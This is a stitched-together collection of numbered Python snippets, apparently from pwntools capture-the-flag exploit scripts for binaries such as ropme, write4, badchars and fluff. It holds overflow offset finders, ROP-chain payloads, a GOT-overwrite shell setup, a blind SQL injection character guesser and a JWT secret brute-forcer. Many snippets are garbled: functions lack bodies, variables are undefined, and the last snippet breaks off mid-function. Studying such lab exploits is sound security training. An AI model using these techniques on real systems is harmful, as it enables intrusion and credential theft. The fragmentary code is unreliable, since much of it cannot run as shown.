    """Crash ./pwnshop with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>', '1') # Try to buy something
    p.sendlineafter('Enter details:', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,457 | from pwn import *
exe = './pwnshop'
# NOTE(review): the addresses below are computed elsewhere in the original
# exploit script.
info("leaked_address: %#x", leaked_addr)
info("pie_base: %#x", elf.address)
info("got_puts: %#x", got_puts)
info("libc_base: %#x", libc.address)
def find_ip(payload):
    """Crash ./pwnshop with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>', '1') # Try to buy something
    p.sendlineafter('Enter details:', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,458 | from pwn import *
gdbscript = '''
init-pwndbg
breakrva 0x00001368
continue
'''.format(**locals())
exe = './optimistic'
def start(argv=[], *a, **kw):
    """Launch ./optimistic locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,459 | from pwn import *
exe = './optimistic'
# NOTE(review): stack_addr is leaked elsewhere in the original exploit script.
info("leaked stack_addr: %#x", stack_addr)
def find_ip(payload):
    """Crash ./optimistic with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter(':', 'y') # Yes, we want to enrol
    p.sendlineafter('Email:', '420') # Provide email address - only reads 8 bytes
    p.sendlineafter('Age:', '1337') # Provide age - also reads 8 bytes
    p.sendlineafter('Length of name:', '-1') # Provide length of name - needs to be <= 64
    p.sendlineafter('Name:', payload) # Provide name (needs to be within length previously specified)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,460 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './format'
def start(argv=[], *a, **kw):
    """Launch ./format locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,462 | from pwn import *
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())
exe = './ropme'
def start(argv=[], *a, **kw):
    """Launch ./ropme locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,463 | from pwn import *
exe = './ropme'
# NOTE(review): the addresses below are computed elsewhere in the original
# exploit script.
info("leaked got_puts: %#x", got_puts)
info("libc_base: %#x", libc.address)
def find_ip(payload):
    """Crash ./ropme with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('?', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,465 | from pwn import *
exe = './ropme'
# NOTE(review): the addresses below are computed elsewhere in the original
# exploit script.
info("leaked got_puts: %#x", got_puts)
info("libc_base: %#x", libc_base)
info("system_addr: %#x", system_addr)
info("bin_sh: %#x", bin_sh)
def find_ip(payload):
    """Crash ./ropme with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('?', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,466 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './htb-console'
def start(argv=[], *a, **kw):
    """Launch ./htb-console locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,467 | from pwn import *
exe = './htb-console'
def find_ip(payload):
    """Crash ./htb-console with a cyclic *payload* and return the saved-RIP offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('>>', 'flag')
    p.sendlineafter('Enter flag:', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc) # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,470 | from pwn import *
exe = './reg'
def find_eip(payload):
    """Crash ./reg with a cyclic *payload* and return the saved-return offset."""
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('Enter your name :', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    eip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
    info('located EIP offset at {a}'.format(a=eip_offset))
    # Return the EIP offset
    return eip_offset
14,471 | from pwn import *
import codecs
gdbscript = '''
init-pwndbg
break *0x401168
continue
'''.format(**locals())
exe = './ropmev2'
def start(argv=[], *a, **kw):
    """Launch ./ropmev2 locally, under GDB, or remotely (pwntools args)."""
    if args.GDB: # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else: # Run locally
        return process([exe] + argv, *a, **kw)
14,472 | from pwn import *
import codecs
def rot13(s): return codecs.getencoder("rot-13")(s)[0]
exe = './ropmev2'
# NOTE(review): leaked_addr is computed elsewhere in the original exploit script.
info("leaked_address: %#x", leaked_addr)
def find_ip(payload):
    """Crash ./ropmev2 with a cyclic *payload* and return the saved-RIP offset.

    The binary ROT13-mangles its input, so the bytes pulled from the
    corefile are un-mangled with rot13() before cyclic_find().
    """
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('Please dont hack me', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    ip_offset = cyclic_find(rot13(p.corefile.read(p.corefile.sp, 4).decode()))
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,474 | from pwn import *
import codecs
def rot13(s):
    """Apply the ROT13 substitution cipher to *s* (body restored; the
    original line was truncated to a bare ``def`` by extraction)."""
    return codecs.getencoder("rot-13")(s)[0]
exe = './ropmev2'
# NOTE(review): leaked_addr is computed elsewhere in the original exploit script.
info("leaked_address: %#x", leaked_addr)
def find_ip(payload):
    """Crash ./ropmev2 with a cyclic *payload* and return the saved-RIP offset.

    The binary ROT13-mangles its input, so the corefile bytes are un-mangled
    with rot13() before cyclic_find().
    """
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('Please dont hack me', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    ip_offset = cyclic_find(rot13(p.corefile.read(p.corefile.sp, 4).decode()))
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset
14,475 | from pwn import *
exe = './jeeves'
def find_eip(payload):
    """Crash ./jeeves with a cyclic *payload* and return the saved-return offset.

    NOTE(review): reads the offset from the crashed rbp register rather than
    the stack -- presumably the overflow clobbers rbp first; verify against
    the binary.
    """
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter('Hello, good sir!', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    eip_offset = cyclic_find(p.corefile.rbp)
    info('located EIP offset at {a}'.format(a=eip_offset))
    # Return the EIP offset
    return eip_offset
14,476 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './chall'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,477 | from pwn import *
import requests
import re
from itertools import cycle
import logging
def sql_inject(sqli_pt1, variable, sqli_pt2):
def guess_len(guess_type, sqli_pt1, sqli_pt2):
# Guess length of DB name, table count etc
for i in range(1, 100):
# Submit SQLi string
response = sql_inject(sqli_pt1, str(i), sqli_pt2)
# Extract the response we're interested in
error_message = re.search(r'User.*\.', response.text).group(0)
debug(error_message)
# If we've found the DB name length, return
if "MISSING" not in error_message:
success(guess_type + str(i) + '\n\n')
return i | null |
14,478 | from pwn import *
import requests
import re
from itertools import cycle
import logging
def sql_inject(sqli_pt1, variable, sqli_pt2):
def guess_name(guess_type, sqli_pt1, sqli_pt2, name_len, min_char_initial, max_char_initial):
name = ""
for i in range(1, name_len + 1):
# Need to reset all these after we find each char
found_next_char = 0
min_char = min_char_initial
max_char = max_char_initial
current_char = int((min_char + max_char) / 2) # start half way through alphabet ('m')
# Should we check greater than or less than?
comparison_types = cycle(['<', '>'])
comparison = next(comparison_types)
while(found_next_char != 2):
# Submit SQLi string ('i' used for substring index, 'current_char' used for finding next char in name)
response = sql_inject(sqli_pt1 + str(i) + "," + str(i) + "))" + comparison, str(current_char), sqli_pt2)
# Extract the response we're interested in
error_message = re.search(r'User.*\.', response.text).group(0)
debug(error_message)
# If ID shows "exists" then condition is true e.g. char > 97
if "MISSING" not in error_message:
# Reset our found_next_char counter
found_next_char = 0
# Next char is greater than the char we just tested
if comparison == '>':
min_char = current_char
# Otherwise, next char is lower than the one we just tested
else:
max_char = current_char
# Reset the current char to test value
current_char = int((min_char + max_char) / 2)
# If ID shows "MISSING" then condition is false e.g. !(char > 97)
else:
# Reverse the comparison check
comparison = next(comparison_types)
# Once this hit '2' in a row we know we've got the right value
found_next_char += 1
# We found our char
name += chr(current_char)
info("Found char(" + str(i) + "): " + chr(current_char))
# We got the whole DB name
success(guess_type + name + '\n\n')
return name | null |
14,479 | import jwt
import base64
secret_key = "intigriti"
print(f"Original token: {token}\n")
print(f"\nModified token: {modified_token}\n")
def verify_token(token):
try:
decoded_token = jwt.decode(token, secret_key, algorithms=["HS256"])
print("Verification Result: Token is valid.")
except jwt.exceptions.InvalidSignatureError:
print("Verification Result: Signature mismatch. Token is invalid.") | null |
14,480 | import jwt
jwt_token = 'INSERT_TOKEN_HERE'
def attempt_fuzzing(secret_key, algorithm):
try:
decoded = jwt.decode(jwt_token, secret_key, algorithms=[algorithm])
print(f"Valid key found: {secret_key}")
print(f"Decoded payload: {decoded}")
return True
except jwt.InvalidSignatureError:
return False
def fuzz_secret_key(wordlist):
header = jwt.get_unverified_header(jwt_token)
algorithm = header.get("alg")
if not algorithm:
print("Algorithm not found in JWT header.")
return None
else:
print(f"Algorithm: {algorithm}")
with open(wordlist, "r") as file:
for line in file:
secret_key = line.strip()
if attempt_fuzzing(secret_key, algorithm):
return secret_key
return None | null |
14,481 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,482 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_changeme'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,483 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_changeme2'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,484 | from pwn import *
gdbscript = '''
init-pwndbg
break *0x401148
continue
'''.format(**locals())
exe = './stack_shellcode'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,485 | from pwn import *
exe = './stack_shellcode'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.recvline()
p.sendline(payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,486 | from pwn import *
from os import environb as env
gdbscript = '''
init-pwndbg
b *main
b *greet+140
continue
'''.format(**locals())
exe = './stack_int-overflow'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,487 | from pwn import *
from os import environ as env
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_overwrite-env'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,488 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './stack_overwrite-function-pointers'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,489 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,490 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_overwrite'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,491 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './heap_use-after-free'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,492 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = '/opt/phoenix/i486/heap-three'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,493 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './secureserver'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,496 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './ret2win_params'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,497 | from pwn import *
exe = './ret2win_params'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b':', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
ip_offset = cyclic_find(p.corefile.pc) # x86
# ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,501 | from pwn import *
exe = './ret2win_params'
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b':', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,504 | from pwn import *
gdbscript = '''
init-pwndbg
break *0x0804921f
break *0x08049253
break *0x0804925e
continue
'''.format(**locals())
exe = './canary'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,505 | from pwn import *
gdbscript = '''
init-pwndbg
piebase
continue
'''.format(**locals())
exe = './pie_server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,506 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './pie_server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,509 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './ret2win'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,511 | from pwn import *
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './server'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,513 | from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
exe = './got_overwrite'
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw) | null |
14,514 | from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
io = start()
io.sendline(b'/bin/sh')
io.interactive()
def send_payload(payload):
io.sendline(payload)
return io.recvline() | null |
14,515 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './split32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,516 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './split'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,517 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './write432'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,518 | from pwn import *
info("%#x data_section_address", data_section_address)
info("%#x pop_edi_pop_ebp", pop_edi_pop_ebp)
info("%#x mov_edi_ebp", mov_edi_ebp)
info("%#x print_file", print_file)
eip_offset = find_eip(100, start())
payload = flat(
asm('nop') * eip_offset, # Offset - 44 bytes
pop_edi_pop_ebp, # Pop .data (1) location into edi and 4 byte string (2) to ebp
data_section_address, # 1
'flag', # 2
mov_edi_ebp, # Move string (2) to memory location (1) stored in edi
# Repeat for remaining part of string
pop_edi_pop_ebp, # Pop .data (1) location into edi and 4 byte string (2) to ebp
data_section_address + 0x4, # 1 (an extra 4 bytes since we wrote "flag")
'.txt', # 2
mov_edi_ebp, # Move string (2) to memory location (1) stored in edi
print_file, # Call print_file()
0x0, # Return pointer
data_section_address # Location of flag.txt string
)
def find_eip(pattern_size, p):
# We will send a 'cyclic' pattern which overwrites the return address on the stack
payload = cyclic(pattern_size)
# PWN
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Open up the corefile
core = p.corefile
# Print out the address of EIP at the time of crashing
eip_value = core.eip
eip_offset = cyclic_find(eip_value)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,519 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './write4'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,520 | from pwn import *
info("%#x data_section_address", data_section_address)
info("%#x pop_r14_pop_r15", pop_r14_pop_r15)
info("%#x mov_r14_r15", mov_r14_r15)
info("%#x print_file", print_file)
payload = flat(
asm('nop') * eip_offset, # Offset - 44 bytes
pop_r14_pop_r15, # Pop .data (1) location into r14 and 4 byte string (2) to r15
data_section_address, # 1
'flag.txt', # 2 - Note we can do 8 bytes as 64-bit
mov_r14_r15, # Move string (2) to memory location (1) stored in r14
# Pop the data address to RDI and call print_file
pop_rdi,
data_section_address,
print_file
)
def find_eip(pattern_size, p):
# We will send a 'cyclic' pattern which overwrites the return address on the stack
payload = cyclic(pattern_size)
# PWN
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Open up the corefile
core = p.corefile
# Print out the address of RSP at the time of crashing
rsp_value = core.rsp
pattern = core.read(rsp_value, 4)
rip_offset = cyclic_find(pattern)
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,522 | from pwn import *
exe = './vuln'
def find_ip(payload):
# Launch process and send payload
p = process(exe, level='warn')
p.sendlineafter(b'>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
# ip_offset = cyclic_find(p.corefile.pc) # x86
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
warn('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset | null |
14,523 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './fluff32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,524 | from pwn import *
exe = './fluff32'
eip_offset = find_eip(cyclic(100))
info("%#x data_section_address", data_section_address)
info("%#x pop_ebp", pop_ebp)
info("%#x mov eax, ebp; mov ebx, 0xb0bababa; pext edx, ebx, eax; mov eax, 0xdeadbeef; ret;", long_pext_gadget)
info("%#x pop ecx; bswap ecx; ret;", bswap_ecx)
info("%#x xchg byte ptr [ecx], dl; ret;", xchg_ecx_dl)
info("%#x print_file", print_file)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip)
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,525 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './fluff'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,526 | from pwn import *
exe = './fluff'
info("%#x data_section_address", data_section_address)
info("%#x pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;", bextr_rbx_rcx_rdx)
info("%#x xlat BYTE PTR ds:[rbx]; ret;", xlatb)
info("%#x pop rdi; ret;", pop_rdi)
info("%#x stosb byte ptr [rdi], al; ret;", stosb_rdi_al)
info("%#x print_file", print_file)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of RSP (RIP) at the time of crashing
rip_offset = cyclic_find(p.corefile.read(p.corefile.rsp, 4))
info('located RIP offset at {a}'.format(a=rip_offset))
# Return the EIP offset
return rip_offset | null |
14,527 | from pwn import *
gdbscript = '''
init-peda
continue
'''.format(**locals())
exe = './ret2win32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,528 | from pwn import *
gdbscript = '''
init-peda
break
'''.format(**locals())
exe = './ret2win'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,529 | from pwn import *
gdbscript = '''
init-gef
break *0x08048547
'''.format(**locals())
exe = './badchars32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,530 | from pwn import *
exe = './badchars32'
eip_offset = find_eip(cyclic(100, alphabet='bcdefhijk'))
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_esi_pop_edi_pop_ebp", pop_esi_pop_edi_pop_ebp)
info("%#x mov_edi_esi", mov_edi_esi)
info("%#x pop_ebp", pop_ebp)
info("%#x pop_ebx", pop_ebx)
info("%#x xor_ebp_bl", xor_ebp_bl)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
eip_offset = cyclic_find(p.corefile.eip, alphabet='bcdefhijk')
info('located EIP offset at {a}'.format(a=eip_offset))
# Return the EIP offset
return eip_offset | null |
14,531 | from pwn import *
gdbscript = '''
init-gef
break print_file
'''.format(**locals())
exe = './badchars32'
def start(argv=[], *a, **kw):
# Start the exploit against the target
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw) | null |
14,532 | from pwn import *
exe = './badchars32'
eip_offset = find_eip(cyclic(100, alphabet='bcdefhijk'))
info(io.recvline_contains('badchars are'))
info("%#x data_section_address", data_section_address)
info("%#x pop_esi_pop_edi_pop_ebp", pop_esi_pop_edi_pop_ebp)
info("%#x print_file", print_file)
info("flag.txt XORd with %d: %s", value_to_xor_with, xored_string)
def find_eip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter('>', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP at the time of crashing
